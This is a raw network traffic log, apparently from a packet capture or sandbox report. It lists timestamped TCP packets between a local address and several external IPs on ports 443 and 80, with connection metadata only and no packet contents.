                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.976125002 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084224939 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084260941 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084415913 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084520102 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084599972 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084630966 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084630966 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084794998 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.084924936 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.085016012 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.085186005 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.085186005 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.085237980 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.085474014 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.193818092 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.193908930 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194039106 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194039106 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194118023 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194161892 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194186926 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194345951 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.194957972 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195050955 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195151091 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195152044 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195226908 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195270061 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195312023 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.195452929 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196002007 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196086884 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196260929 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196261883 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196261883 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196362019 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196403980 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196403980 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.196594000 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.304872036 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.305005074 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.305166006 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.305233002 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.305233002 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.305283070 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.305567980 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306173086 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306272984 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306436062 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306437016 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306437016 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306525946 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306556940 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.306812048 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.307396889 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.307471037 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.307630062 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.307687044 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.307728052 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.307914019 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.308650970 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.308670998 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.308852911 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.308958054 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.308958054 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.308979988 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309032917 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309115887 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309243917 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309243917 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309266090 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309357882 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309357882 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309416056 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309432983 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309433937 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309448957 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309537888 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309602022 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.309679985 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.418943882 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.418982983 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419159889 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419159889 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419189930 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419209003 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419209003 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419209003 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419209003 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419290066 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419397116 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419441938 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419478893 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419620037 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419620037 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419651985 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419724941 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419724941 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419745922 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419886112 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419949055 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.419984102 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420145035 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420145035 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420166016 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420351028 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420351028 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420651913 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420695066 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420855999 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420891047 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420892000 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420912027 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.420978069 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421080112 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421288013 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421325922 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421490908 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421526909 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421526909 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421546936 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421612978 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421730042 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.421972990 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422014952 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422171116 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422171116 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422203064 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422218084 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422218084 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422286034 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422312021 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422410011 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422638893 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422679901 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422799110 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422799110 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422846079 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422846079 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422846079 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422861099 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.422943115 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423320055 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423449039 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423597097 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423635006 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423780918 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423901081 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.423909903 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.424015999 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.424079895 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.424324036 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.424474001 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:07.424487114 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.081490040 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.176929951 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.177294016 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.183563948 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.282968998 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.285993099 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.286077023 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.286139011 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.286355019 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.286355019 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.289122105 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.290580988 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.290760040 CEST4974080192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.384931087 CEST8049740199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.208728075 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.570487022 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.570851088 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.580940962 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.942739010 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.114974976 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115036964 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115076065 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115113020 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115164995 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115216017 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115252018 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115288019 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115294933 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115403891 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115441084 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115451097 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115607977 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.116379976 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.116642952 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.477997065 CEST8049741103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:00.096406937 CEST4974180192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:01.114278078 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:01.475734949 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:01.476031065 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:01.483755112 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:01.845002890 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022720098 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022825956 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022888899 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022945881 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023029089 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023086071 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023124933 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023161888 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023180962 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023257971 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023260117 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023432970 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023705006 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023767948 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023816109 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023996115 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.986496925 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.003946066 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.412071943 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.412395000 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.420373917 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.784869909 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.784961939 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.785060883 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.785384893 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.785473108 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090292931 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090445042 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090620995 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090655088 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090795994 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090895891 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090949059 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091032982 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091109037 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091175079 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091197014 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091280937 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091356039 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091413021 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091415882 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091583014 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.923257113 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:06.940941095 CEST4974480192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.301938057 CEST8049744103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.302340984 CEST4974480192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.307566881 CEST4974480192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.668653011 CEST8049744103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.780873060 CEST8049744103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.780958891 CEST8049744103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.781411886 CEST4974480192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.783544064 CEST4974480192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:08.144905090 CEST8049744103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.240349054 CEST4974580192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.372265100 CEST804974572.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.372715950 CEST4974580192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.382955074 CEST4974580192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.516876936 CEST804974572.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.516897917 CEST804974572.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.517139912 CEST4974580192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:22.888309956 CEST4974580192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:23.905936956 CEST4974680192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.037903070 CEST804974672.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.038249969 CEST4974680192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.055092096 CEST4974680192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.189296007 CEST804974672.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.189363956 CEST804974672.14.178.174192.168.11.20
